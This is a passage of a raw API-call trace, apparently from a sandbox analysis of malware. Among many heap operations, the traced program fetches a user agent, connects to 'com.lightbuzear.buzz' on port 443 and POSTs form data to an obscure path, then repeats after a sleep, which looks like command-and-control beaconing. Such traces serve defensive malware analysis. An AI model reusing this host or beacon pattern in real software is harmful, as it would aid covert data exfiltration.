dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0254.061] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0254.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0254.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800460 | out: hHeap=0x4780000) returned 1 [0254.062] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0254.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0254.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0254.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0254.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0254.062] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0254.062] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0254.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0254.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c20 [0254.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b78 [0254.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c20 | out: hHeap=0x4780000) returned 1 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0254.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b78 | out: hHeap=0x4780000) returned 1 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800208 [0254.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0254.063] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800208 | out: hHeap=0x4780000) returned 1 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48000a0 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0254.063] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48003e8 [0254.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0254.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0254.064] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0254.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0254.065] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48003e8 | out: hHeap=0x4780000) returned 1 [0254.065] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0254.065] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0254.065] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0254.065] FreeLibrary (hLibModule=0x71570000) returned 1 [0254.065] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0254.065] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0254.065] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800118 | out: hHeap=0x4780000) returned 1 [0254.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4801018 | out: hHeap=0x4780000) returned 1 [0254.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0254.066] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0254.066] Sleep (dwMilliseconds=0x2710) [0254.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0254.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0254.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0254.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0254.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0254.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0254.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0254.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0254.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0254.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0254.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0254.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0254.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0254.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0254.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0254.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815b30 [0254.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0254.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0254.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0254.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0254.260] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0254.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0254.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0254.260] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0254.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0254.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0254.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0254.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0254.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0254.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0254.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815b78 [0254.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0254.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0254.268] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b78 | out: hHeap=0x4780000) returned 1 [0254.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0254.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0254.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800c30 [0254.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0254.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0254.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0254.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c30 [0254.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0254.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4801018 [0254.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0254.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0254.270] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0254.270] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0254.270] FreeLibrary (hLibModule=0x71780000) returned 1 [0254.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4801018 | out: hHeap=0x4780000) returned 1 [0254.271] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0254.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4801018 [0254.271] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0254.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0254.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0254.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0254.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815b78 [0254.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c80 [0254.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b78 | out: hHeap=0x4780000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0254.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c80 | out: hHeap=0x4780000) returned 1 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815cb0 [0254.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800528 [0254.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800528 | out: hHeap=0x4780000) returned 1 [0254.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0254.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48003c0 [0254.273] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0254.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800460 [0254.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0254.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0254.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0254.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0254.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0254.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0254.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0254.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0254.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0254.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0254.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0254.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815bc0 [0254.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0254.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0254.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0254.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815b18 [0254.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0254.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0254.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0254.274] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800528 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0254.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800528 | out: hHeap=0x4780000) returned 1 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48003e8 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0254.275] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800118 [0254.276] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0254.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0254.287] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0254.287] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0254.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800118 | out: hHeap=0x4780000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0254.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0254.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0254.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0254.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0254.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c80 [0254.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0254.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c80 | out: hHeap=0x4780000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800118 [0254.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0254.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0254.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800118 | out: hHeap=0x4780000) returned 1 [0254.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800398 [0254.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0254.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800348 [0254.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0254.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0254.289] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0254.290] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0255.762] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800348 | out: hHeap=0x4780000) returned 1 [0255.763] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0255.763] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0255.763] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0255.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0255.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0255.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0255.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0255.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815bd8 [0255.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0255.764] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bd8 | out: hHeap=0x4780000) returned 1 [0255.764] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800370 [0255.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0255.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0255.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800370 | out: hHeap=0x4780000) returned 1 [0255.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800370 [0255.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0255.765] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800118 [0255.765] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0255.766] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0255.766] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0255.766] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0255.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800118 | out: hHeap=0x4780000) returned 1 [0255.767] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0255.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0255.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0255.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0255.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0255.767] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0255.767] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0255.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0255.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c08 [0255.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815bc0 [0255.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c08 | out: hHeap=0x4780000) returned 1 [0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0255.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800528 [0255.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0255.768] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800528 | out: hHeap=0x4780000) returned 1 [0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48004b0 [0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 